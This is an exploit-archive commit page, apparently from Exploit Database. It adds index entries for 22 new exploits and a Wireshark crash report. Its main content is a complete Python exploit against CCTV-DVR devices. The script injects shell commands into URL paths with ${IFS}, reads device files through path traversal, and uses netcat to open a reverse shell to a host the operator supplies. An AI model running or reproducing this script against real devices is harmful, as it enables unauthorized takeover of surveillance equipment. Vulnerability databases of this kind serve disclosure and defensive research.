Skip to content

Commit dfc00ff

Browse files
author
Offensive Security
committed
DB: 2016-03-24
22 new exploits Windows NDProxy - Privilege Escalation XP SP3 x86 and 2003 SP2 x86 (MS14-002) Windows XP SP3 x86 and 2003 SP2 x86 - NDProxy Privilege Escalation (MS14-002) exim <= 4.84-3 - Local Root Exploit Exim <= 4.84-3 - Local Root Exploit CoolPlayer (Standalone) build 2.19 - .m3u Stack Overflow OS X / iOS Suid Binary Logic Error Kernel Code Execution Multiple CCTV-DVR Vendors - Remote Code Execution MiCollab 7.0 - SQL Injection Vulnerability Comodo Antivirus Forwards Emulated API Calls to the Real API During Scans Avira - Heap Underflow Parsing PE Section Headers Comodo - PackMan Unpacker Insufficient Parameter Validation Comodo - LZMA Decoder Heap Overflow via Insufficient Parameter Checks Comodo - Integer Overlow Leading to Heap Overflow Parsing Composite Documents Wireshark - dissect_ber_integer Static Out-of-Bounds Write Comodo - Integer Overflow Leading to Heap Overflow in Win32 Emulation Comodo Antivirus - Heap Overflow in LZX Decompression OS X Kernel - Code Execution Due to Lack of Bounds Checking in AppleUSBPipe::Abort Adobe Flash - Shape Rendering Crash Adobe Flash - Zlib Codec Heap Overflow Adobe Flash - Sprite Creation Use-After-Free Adobe Flash - Uninitialized Stack Parameter Access in AsBroadcaster.broadcastMessage UaF Fix Adobe Flash - Uninitialized Stack Parameter Access in Object.unwatch UaF Fix Adobe Flash - Uninitialized Stack Parameter Access in MovieClip.swapDepths UaF Fix OS X Kernel - AppleKeyStore Use-After-Free OS X Kernel - Unchecked Array Index Used to Read Object Pointer Then Call Virtual Method in nVidia Geforce Driver OS X Kernel Use-After-Free and Double Delete Due to Incorrect Locking in Intel GPU Driver
1 parent ca6eab3 commit dfc00ff

23 files changed

Lines changed: 1714 additions & 2 deletions

File tree

files.csv

Lines changed: 24 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -34071,7 +34071,7 @@ id,file,description,date,author,platform,type,port
3407134071
37729,platforms/windows/remote/37729.py,"Filezilla Client 2.2.X - SEH Buffer Overflow Exploit",2015-08-07,ly0n,windows,remote,0
3407234072
37730,platforms/windows/local/37730.py,"Tomabo MP4 Player 3.11.3 - (.m3u) SEH Buffer Overflow",2015-08-07,"Saeid Atabaki",windows,local,0
3407334073
37731,platforms/windows/remote/37731.py,"PCMan FTP Server 2.0.7 - PUT Command Buffer Overflow",2015-08-07,"Jay Turla",windows,remote,21
34074-
37732,platforms/win32/local/37732.c,"Windows NDProxy - Privilege Escalation XP SP3 x86 and 2003 SP2 x86 (MS14-002)",2015-08-07,"Tomislav Paskalev",win32,local,0
34074+
37732,platforms/win32/local/37732.c,"Windows XP SP3 x86 and 2003 SP2 x86 - NDProxy Privilege Escalation (MS14-002)",2015-08-07,"Tomislav Paskalev",win32,local,0
3407534075
37734,platforms/php/webapps/37734.html,"Microweber 1.0.3 - Stored XSS And CSRF Add Admin Exploit",2015-08-07,LiquidWorm,php,webapps,80
3407634076
37735,platforms/php/webapps/37735.txt,"Microweber 1.0.3 File Upload Filter Bypass Remote PHP Code Execution",2015-08-07,LiquidWorm,php,webapps,80
3407734077
37747,platforms/windows/dos/37747.py,"Havij Pro - Crash POC",2015-08-10,i_7e1,windows,dos,0
@@ -35770,7 +35770,7 @@ id,file,description,date,author,platform,type,port
3577035770
39531,platforms/windows/local/39531.c,"McAfee VirusScan Enterprise 8.8 - Security Restrictions Bypass",2016-03-07,"Maurizio Agazzini",windows,local,0
3577135771
39533,platforms/windows/dos/39533.txt,"Adobe Digital Editions <= 4.5.0 - .pdf Critical Memory Corruption",2016-03-09,"Pier-Luc Maltais",windows,dos,0
3577235772
39534,platforms/php/webapps/39534.html,"Bluethrust Clan Scripts v4 R17 - Multiple Vulnerabilities",2016-03-09,"Brandon Murphy",php,webapps,80
35773-
39535,platforms/linux/local/39535.sh,"exim <= 4.84-3 - Local Root Exploit",2016-03-09,"Hacker Fantastic",linux,local,0
35773+
39535,platforms/linux/local/39535.sh,"Exim <= 4.84-3 - Local Root Exploit",2016-03-09,"Hacker Fantastic",linux,local,0
3577435774
39536,platforms/php/webapps/39536.txt,"WordPress SiteMile Project Theme 2.0.9.5 - Multiple Vulnerabilities",2016-03-09,"LSE Leading Security Experts GmbH",php,webapps,80
3577535775
39537,platforms/linux/dos/39537.txt,"Linux Kernel - digi_acceleport Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0
3577635776
39538,platforms/linux/dos/39538.txt,"Linux Kernel - Wacom Multiple Nullpointer Dereferences",2016-03-09,"OpenSource Security",linux,dos,0
@@ -35824,3 +35824,25 @@ id,file,description,date,author,platform,type,port
3582435824
39591,platforms/php/webapps/39591.txt,"WordPress Brandfolder Plugin 3.0 - RFI / LFI Vulnerability",2016-03-22,AMAR^SHG,php,webapps,80
3582535825
39592,platforms/php/webapps/39592.txt,"WordPress Dharma booking Plugin 2.38.3 - File Inclusion Vulnerability",2016-03-22,AMAR^SHG,php,webapps,80
3582635826
39593,platforms/php/webapps/39593.txt,"WordPress Memphis Document Library Plugin 3.1.5 - Arbitrary File Download",2016-03-22,"Felipe Molina",php,webapps,80
35827+
39594,platforms/windows/local/39594.pl,"CoolPlayer (Standalone) build 2.19 - .m3u Stack Overflow",2016-03-22,"Charley Celice",windows,local,0
35828+
39595,platforms/multiple/local/39595.txt,"OS X / iOS Suid Binary Logic Error Kernel Code Execution",2016-03-23,"Google Security Research",multiple,local,0
35829+
39596,platforms/hardware/remote/39596.py,"Multiple CCTV-DVR Vendors - Remote Code Execution",2016-03-23,K1P0D,hardware,remote,0
35830+
39597,platforms/multiple/webapps/39597.txt,"MiCollab 7.0 - SQL Injection Vulnerability",2016-03-23,"Goran Tuzovic",multiple,webapps,80
35831+
39599,platforms/windows/remote/39599.txt,"Comodo Antivirus Forwards Emulated API Calls to the Real API During Scans",2016-03-23,"Google Security Research",windows,remote,0
35832+
39600,platforms/windows/dos/39600.txt,"Avira - Heap Underflow Parsing PE Section Headers",2016-03-23,"Google Security Research",windows,dos,0
35833+
39601,platforms/windows/dos/39601.txt,"Comodo - PackMan Unpacker Insufficient Parameter Validation",2016-03-23,"Google Security Research",windows,dos,0
35834+
39602,platforms/windows/dos/39602.txt,"Comodo - LZMA Decoder Heap Overflow via Insufficient Parameter Checks",2016-03-23,"Google Security Research",windows,dos,0
35835+
39603,platforms/windows/dos/39603.txt,"Comodo - Integer Overlow Leading to Heap Overflow Parsing Composite Documents",2016-03-23,"Google Security Research",windows,dos,0
35836+
39604,platforms/multiple/dos/39604.txt,"Wireshark - dissect_ber_integer Static Out-of-Bounds Write",2016-03-23,"Google Security Research",multiple,dos,0
35837+
39605,platforms/windows/dos/39605.txt,"Comodo - Integer Overflow Leading to Heap Overflow in Win32 Emulation",2016-03-23,"Google Security Research",windows,dos,0
35838+
39606,platforms/windows/dos/39606.txt,"Comodo Antivirus - Heap Overflow in LZX Decompression",2016-03-23,"Google Security Research",windows,dos,0
35839+
39607,platforms/osx/dos/39607.c,"OS X Kernel - Code Execution Due to Lack of Bounds Checking in AppleUSBPipe::Abort",2016-03-23,"Google Security Research",osx,dos,0
35840+
39608,platforms/windows/dos/39608.txt,"Adobe Flash - Shape Rendering Crash",2016-03-23,"Google Security Research",windows,dos,0
35841+
39609,platforms/windows/dos/39609.txt,"Adobe Flash - Zlib Codec Heap Overflow",2016-03-23,"Google Security Research",windows,dos,0
35842+
39610,platforms/windows/dos/39610.txt,"Adobe Flash - Sprite Creation Use-After-Free",2016-03-23,"Google Security Research",windows,dos,0
35843+
39611,platforms/windows/dos/39611.txt,"Adobe Flash - Uninitialized Stack Parameter Access in AsBroadcaster.broadcastMessage UaF Fix",2016-03-23,"Google Security Research",windows,dos,0
35844+
39612,platforms/windows/dos/39612.txt,"Adobe Flash - Uninitialized Stack Parameter Access in Object.unwatch UaF Fix",2016-03-23,"Google Security Research",windows,dos,0
35845+
39613,platforms/windows/dos/39613.txt,"Adobe Flash - Uninitialized Stack Parameter Access in MovieClip.swapDepths UaF Fix",2016-03-23,"Google Security Research",windows,dos,0
35846+
39614,platforms/osx/dos/39614.c,"OS X Kernel - AppleKeyStore Use-After-Free",2016-03-23,"Google Security Research",osx,dos,0
35847+
39615,platforms/osx/dos/39615.c,"OS X Kernel - Unchecked Array Index Used to Read Object Pointer Then Call Virtual Method in nVidia Geforce Driver",2016-03-23,"Google Security Research",osx,dos,0
35848+
39616,platforms/osx/dos/39616.c,"OS X Kernel Use-After-Free and Double Delete Due to Incorrect Locking in Intel GPU Driver",2016-03-23,"Google Security Research",osx,dos,0

platforms/hardware/remote/39596.py

Lines changed: 208 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,208 @@
1+
#!/usr/bin/python
2+
3+
# Blog post: http://www.kerneronsec.com/2016/02/remote-code-execution-in-cctv-dvrs-of.html
4+
5+
'''
6+
Vendors List
7+
8+
Ademco
9+
ATS Alarmes technolgy and ststems
10+
Area1Protection
11+
Avio
12+
Black Hawk Security
13+
Capture
14+
China security systems
15+
Cocktail Service
16+
Cpsecured
17+
CP PLUS
18+
Digital Eye'z no website
19+
Diote Service & Consulting
20+
DVR Kapta
21+
ELVOX
22+
ET Vision
23+
Extra Eye 4 U
24+
eyemotion
25+
EDS
26+
Fujitron
27+
Full HD 1080p
28+
Gazer
29+
Goldeye
30+
Goldmaster
31+
Grizzly
32+
HD IViewer
33+
Hi-View
34+
Ipcom
35+
IPOX
36+
IR
37+
ISC Illinois Security Cameras, Inc.
38+
JFL Alarmes
39+
Lince
40+
LOT
41+
Lux
42+
Lynx Security
43+
Magtec
44+
Meriva Security
45+
Multistar
46+
Navaio
47+
NoVus
48+
Optivision
49+
PARA Vision
50+
Provision-ISR
51+
Q-See
52+
Questek
53+
Retail Solution Inc
54+
RIT Huston .com
55+
ROD Security cameras
56+
Satvision
57+
Sav Technology
58+
Skilleye
59+
Smarteye
60+
Superior Electrial Systems
61+
TechShell
62+
TechSon
63+
Technomate
64+
TecVoz
65+
TeleEye
66+
Tomura
67+
truVue
68+
TVT
69+
Umbrella
70+
United Video Security System, Inc
71+
Universal IT Solutions
72+
US IT Express
73+
U-Spy Store
74+
Ventetian
75+
V-Gurad Security
76+
Vid8
77+
Vtek
78+
Vision Line
79+
Visar
80+
Vodotech.com
81+
Vook
82+
Watchman
83+
Xrplus
84+
Yansi
85+
Zetec
86+
ZoomX
87+
'''
88+
89+
from sys import argv
90+
import optparse
91+
from urlparse import urlparse
92+
from re import compile
93+
import socket
94+
import requests
95+
from requests.exceptions import ConnectionError, Timeout, ContentDecodingError
96+
from socket import timeout
97+
98+
99+
100+
101+
def main():
102+
103+
# parse command line options and atguments
104+
optparser = optparse.OptionParser(usage="%s <target-url> [options]" % argv[0])
105+
optparser.add_option('-c','--check',action="store_true",dest="checkvuln", default=False,
106+
help="Check if target is vulnerable")
107+
optparser.add_option('-e','--exploit', action="store", type="string", dest="connback",
108+
help="Fire the exploit against the given target URL")
109+
110+
(options, args) = optparser.parse_args()
111+
112+
try:
113+
target = args[0]
114+
except IndexError:
115+
optparser.print_help()
116+
exit()
117+
118+
target_url = urlparse(target)
119+
120+
# validating hostname
121+
if not target_url.hostname:
122+
print "[X] supplied target \"%s\" is not a valid URL" % target
123+
optparser.print_help()
124+
exit()
125+
126+
# A little hack to handle read timeouts, since urllib2 doesnt give us this functionality.
127+
socket.setdefaulttimeout(10)
128+
129+
# is -c flag on check if target url is vulnrable.
130+
if options.checkvuln is True:
131+
print "[!] Checking if target \"%s\" is vulnable..." % target_url.netloc
132+
try:
133+
134+
# Write file
135+
raw_url_request('%s://%s/language/Swedish${IFS}&&echo${IFS}1>test&&tar${IFS}/string.js'
136+
% (target_url.scheme, target_url.netloc))
137+
138+
# Read the file.
139+
response = raw_url_request('%s://%s/../../../../../../../mnt/mtd/test' % (target_url.scheme, target_url.netloc))
140+
141+
142+
# remove it..
143+
raw_url_request('%s://%s//language/Swedish${IFS}&&rm${IFS}test&&tar${IFS}/string.js'
144+
% (target_url.scheme, target_url.netloc))
145+
146+
except (ConnectionError, Timeout, timeout) as e:
147+
print "[X] Unable to connect. reason: %s. exiting..." % e.message
148+
return
149+
if response.text[0] != '1':
150+
print "[X] Expected response content first char to be '1' got %s. exiting..." % response.text
151+
return
152+
153+
print "[V] Target \"%s\" is vulnerable!" % target_url.netloc
154+
155+
156+
157+
# if -e is on then fire exploit,
158+
if options.connback is not None:
159+
160+
# Validate connect-back information.
161+
pattern = compile('(?P<host>[a-zA-Z0-9\.\-]+):(?P<port>[0-9]+)')
162+
match = pattern.search(options.connback)
163+
if not match:
164+
print "[X] given connect back \"%s\" should be in the format for host:port" % options.connback
165+
optparser.print_help()
166+
exit()
167+
168+
# fire remote code execution!
169+
170+
# Three ..
171+
try:
172+
raw_url_request('%s://%s/language/Swedish${IFS}&&echo${IFS}nc${IFS}%s${IFS}%s${IFS}>e&&${IFS}/a'
173+
% (target_url.scheme, target_url.netloc, match.group('host'), match.group('port')))
174+
175+
# Two ...
176+
177+
raw_url_request('%s://%s/language/Swedish${IFS}&&echo${IFS}"-e${IFS}$SHELL${IFS}">>e&&${IFS}/a'
178+
% (target_url.scheme, target_url.netloc))
179+
180+
181+
# One. Left off!
182+
raw_url_request('%s://%s/language/Swedish&&$(cat${IFS}e)${IFS}&>r&&${IFS}/s'
183+
% (target_url.scheme, target_url.netloc))
184+
185+
except (ConnectionError, Timeout, timeout) as e:
186+
print "[X] Unable to connect reason: %s. exiting..." % e.message
187+
188+
189+
190+
print "[V] Exploit payload sent!, if nothing went wrong we should be getting a reversed remote shell at %s:%s" \
191+
% (match.group('host'), match.group('port'))
192+
193+
194+
# Disabling URL encode hack
195+
def raw_url_request(url):
196+
r = requests.Request('GET')
197+
r.url = url
198+
r = r.prepare()
199+
# set url without encoding
200+
r.url = url
201+
202+
s = requests.Session()
203+
return s.send(r)
204+
205+
206+
207+
if __name__ == '__main__':
208+
main()

platforms/multiple/dos/39604.txt

Lines changed: 98 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,98 @@
1+
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=750
2+
3+
The following crash due to a static memory out-of-bounds write can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
4+
5+
--- cut ---
6+
==28209==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7fde2f36bfc4 at pc 0x7fde25b1332c bp 0x7fffe48bc670 sp 0x7fffe48bc668
7+
WRITE of size 4 at 0x7fde2f36bfc4 thread T0
8+
#0 0x7fde25b1332b in dissect_ber_integer epan/dissectors/packet-ber.c:2001:16
9+
#1 0x7fde27f46621 in dissect_kerberos_ADDR_TYPE epan/dissectors/../../asn1/kerberos/kerberos.cnf:351:12
10+
#2 0x7fde25b1959a in dissect_ber_sequence epan/dissectors/packet-ber.c:2415:17
11+
#3 0x7fde27f4656f in dissect_kerberos_HostAddress epan/dissectors/../../asn1/kerberos/kerberos.cnf:233:12
12+
#4 0x7fde25b1959a in dissect_ber_sequence epan/dissectors/packet-ber.c:2415:17
13+
#5 0x7fde27f4badf in dissect_kerberos_EncKrbPrivPart epan/dissectors/../../asn1/kerberos/kerberos.cnf:407:12
14+
#6 0x7fde25b040f7 in dissect_ber_tagged_type epan/dissectors/packet-ber.c:695:18
15+
#7 0x7fde27f42384 in dissect_kerberos_ENC_KRB_PRIV_PART epan/dissectors/../../asn1/kerberos/kerberos.cnf:417:12
16+
#8 0x7fde25b1f100 in dissect_ber_choice epan/dissectors/packet-ber.c:2917:21
17+
#9 0x7fde27f4139a in dissect_kerberos_Applications epan/dissectors/../../asn1/kerberos/kerberos.cnf:185:12
18+
#10 0x7fde27f3f7b2 in dissect_kerberos_common epan/dissectors/../../asn1/kerberos/packet-kerberos-template.c:2103:10
19+
#11 0x7fde27f3e22f in dissect_kerberos_main epan/dissectors/../../asn1/kerberos/packet-kerberos-template.c:2134:10
20+
#12 0x7fde26f3c34f in dissect_pktc_mtafqdn epan/dissectors/packet-pktc.c:566:15
21+
#13 0x7fde256145c1 in call_dissector_through_handle epan/packet.c:626:8
22+
#14 0x7fde25606f3a in call_dissector_work epan/packet.c:701:9
23+
#15 0x7fde2560670d in dissector_try_uint_new epan/packet.c:1160:9
24+
#16 0x7fde256072b4 in dissector_try_uint epan/packet.c:1186:9
25+
#17 0x7fde277709e5 in decode_udp_ports epan/dissectors/packet-udp.c:583:7
26+
#18 0x7fde2777fa80 in dissect epan/dissectors/packet-udp.c:1081:5
27+
#19 0x7fde27773840 in dissect_udplite epan/dissectors/packet-udp.c:1094:3
28+
#20 0x7fde256145c1 in call_dissector_through_handle epan/packet.c:626:8
29+
#21 0x7fde25606f3a in call_dissector_work epan/packet.c:701:9
30+
#22 0x7fde2560670d in dissector_try_uint_new epan/packet.c:1160:9
31+
#23 0x7fde267660bb in ip_try_dissect epan/dissectors/packet-ip.c:1978:7
32+
#24 0x7fde26770de8 in dissect_ip_v4 epan/dissectors/packet-ip.c:2472:10
33+
#25 0x7fde26766819 in dissect_ip epan/dissectors/packet-ip.c:2495:5
34+
#26 0x7fde256145c1 in call_dissector_through_handle epan/packet.c:626:8
35+
#27 0x7fde25606f3a in call_dissector_work epan/packet.c:701:9
36+
#28 0x7fde2560670d in dissector_try_uint_new epan/packet.c:1160:9
37+
#29 0x7fde256072b4 in dissector_try_uint epan/packet.c:1186:9
38+
#30 0x7fde26f6e380 in dissect_ppp_common epan/dissectors/packet-ppp.c:4344:10
39+
#31 0x7fde26f6db3c in dissect_ppp_hdlc_common epan/dissectors/packet-ppp.c:5337:5
40+
#32 0x7fde26f65df5 in dissect_ppp_hdlc epan/dissectors/packet-ppp.c:5378:5
41+
#33 0x7fde256145c1 in call_dissector_through_handle epan/packet.c:626:8
42+
#34 0x7fde25606f3a in call_dissector_work epan/packet.c:701:9
43+
#35 0x7fde2560670d in dissector_try_uint_new epan/packet.c:1160:9
44+
#36 0x7fde2634fe55 in dissect_frame epan/dissectors/packet-frame.c:493:11
45+
#37 0x7fde256145c1 in call_dissector_through_handle epan/packet.c:626:8
46+
#38 0x7fde25606f3a in call_dissector_work epan/packet.c:701:9
47+
#39 0x7fde25610a7e in call_dissector_only epan/packet.c:2674:8
48+
#40 0x7fde2560243f in call_dissector_with_data epan/packet.c:2687:8
49+
#41 0x7fde25601814 in dissect_record epan/packet.c:509:3
50+
#42 0x7fde255b4bb9 in epan_dissect_run_with_taps epan/epan.c:376:2
51+
#43 0x52f11b in process_packet tshark.c:3748:5
52+
#44 0x52840c in load_cap_file tshark.c:3504:11
53+
#45 0x51e71c in main tshark.c:2213:13
54+
55+
0x7fde2f36bfc4 is located 4 bytes to the right of global variable 'cb' defined in 'packet-pktc.c:539:27' (0x7fde2f36bfa0) of size 32
56+
SUMMARY: AddressSanitizer: global-buffer-overflow epan/dissectors/packet-ber.c:2001:16 in dissect_ber_integer
57+
Shadow bytes around the buggy address:
58+
0x0ffc45e657a0: 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9
59+
0x0ffc45e657b0: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
60+
0x0ffc45e657c0: 00 f9 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00
61+
0x0ffc45e657d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
62+
0x0ffc45e657e0: 00 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9 f9 f9
63+
=>0x0ffc45e657f0: f9 f9 f9 f9 00 00 00 00[f9]f9 f9 f9 00 00 00 00
64+
0x0ffc45e65800: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
65+
0x0ffc45e65810: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
66+
0x0ffc45e65820: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
67+
0x0ffc45e65830: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
68+
0x0ffc45e65840: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
69+
Shadow byte legend (one shadow byte represents 8 application bytes):
70+
Addressable: 00
71+
Partially addressable: 01 02 03 04 05 06 07
72+
Heap left redzone: fa
73+
Heap right redzone: fb
74+
Freed heap region: fd
75+
Stack left redzone: f1
76+
Stack mid redzone: f2
77+
Stack right redzone: f3
78+
Stack partial redzone: f4
79+
Stack after return: f5
80+
Stack use after scope: f8
81+
Global redzone: f9
82+
Global init order: f6
83+
Poisoned by user: f7
84+
Container overflow: fc
85+
Array cookie: ac
86+
Intra object redzone: bb
87+
ASan internal: fe
88+
Left alloca redzone: ca
89+
Right alloca redzone: cb
90+
==28209==ABORTING
91+
--- cut ---
92+
93+
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12206. Attached is a file which triggers the crash.
94+
95+
96+
Proof of Concept:
97+
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39604.zip
98+

0 commit comments

Comments
 (0)